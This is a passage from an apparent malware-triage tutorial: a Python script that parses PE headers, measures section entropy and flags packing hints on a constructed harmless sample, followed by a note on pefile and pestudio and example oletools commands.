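optional header, section table); the sample file is a minimal constructed
PE32+ image, not a real binary.
"""
import hashlib
import math
import struct
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumed list of section names that common packers leave behind.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite", ".vmp0", ".vmp1", ".themida"}

def shannon_entropy(buf):
    """Bits per byte: 0.0 for constant data, close to 8.0 for compressed or encrypted data."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe(data):
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature (bad e_lfanew?)")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry,) = struct.unpack_from("<I", data, opt + 16)  # AddressOfEntryPoint, same offset in PE32 and PE32+
    if magic == 0x20B:                                    # PE32+
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    elif magic == 0x10B:                                  # PE32
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        if off + 40 > len(data):
            raise ValueError("section table runs past end of file")
        name, vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from("<8sIIIIIIHHI", data, off)
        raw = data[rptr:rptr + rsize]                     # may come back short on a truncated or malformed file
        sections.append({"name": name.rstrip(b"\x00").decode("latin-1"), "virtual_address": va,
                         "virtual_size": vsize, "raw_size": rsize, "raw_offset": rptr,
                         "characteristics": sc, "entropy": shannon_entropy(raw)})
        off += 40
    return {"machine": machine, "compiled": datetime.fromtimestamp(ts, timezone.utc),
            "characteristics": chars, "entry_point": entry, "image_base": image_base, "sections": sections}

def section_for_rva(pe, rva):
    for s in pe["sections"]:
        if s["virtual_address"] <= rva < s["virtual_address"] + max(s["virtual_size"], s["raw_size"]):
            return s
    return None

def assess(pe):
    """Cheap triage flags; high entropy or a W+X section is a hint of packing, not proof."""
    flags = []
    for s in pe["sections"]:
        if s["name"] in PACKER_SECTION_NAMES:
            flags.append(f"packer-section-name:{s['name']}")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            flags.append(f"wx-section:{s['name']}")
        if s["entropy"] > 7.0:
            flags.append(f"high-entropy:{s['name']}")
    ep = section_for_rva(pe, pe["entry_point"])
    if ep is None:
        flags.append("entry-point-outside-sections")
    elif ep["entropy"] > 7.0:
        flags.append(f"entry-point-in-high-entropy-section:{ep['name']}")
    return flags

def build_sample_pe():
    """Constructed minimal PE32+: a NOP-filled .text and a UPX1-style W+X section (not real UPX output)."""
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\x00")   # e_lfanew = 0x80
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x8664, 2, 0x5F5E1000, 0, 0, 240, 0x22)
    optional = bytearray(240)
    struct.pack_into("<H", optional, 0, 0x20B)
    struct.pack_into("<I", optional, 16, 0x3000)            # entry point RVA inside UPX1
    struct.pack_into("<Q", optional, 24, 0x140000000)
    text_hdr = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    upx_hdr = struct.pack("<8sIIIIIIHHI", b"UPX1", 0x2000, 0x3000, 0x1000, 0x400, 0, 0, 0, 0, 0xE0000040)
    headers = (dos + coff + bytes(optional) + text_hdr + upx_hdr).ljust(0x200, b"\x00")
    text = b"\x90" * 0x200                                   # constant bytes: entropy 0
    blob, chunk = b"", b"seed"
    while len(blob) < 0x1000:                                # deterministic pseudo-random bytes: entropy near 8
        chunk = hashlib.sha256(chunk).digest()
        blob += chunk
    return headers + text + blob

if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print(f"machine {pe['machine']:#x} compiled {pe['compiled'].isoformat()} entry {pe['entry_point']:#x}")
    for s in pe["sections"]:
        print(f"{s['name']:<8} rva {s['virtual_address']:#07x} raw {s['raw_size']:#06x} entropy {s['entropy']:.2f}")
    print("flags:", assess(pe))
```

The same walk is what you get from pefile's `PE(data)` object with far more coverage (imports, exports, resources, relocations, rich header), and what pestudio or DIE turn into an indicator list. The checks in assess are deliberately conservative: a W+X section, a known packer section name, entropy above 7 bits per byte, or an entry point that lands in such a section each merit a closer look, but none of them alone says the file is malicious, and a malformed file can place the entry point outside any section on purpose to trip naive tools, which is why bounds are checked at every step.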

oletools

oletools is a package of Python tools to analyze Microsoft OLE2 files.

Examples:

oleid test.doc
olevba test.doc
olevba --deobf --reveal test.doc
olevba "test.xlsm"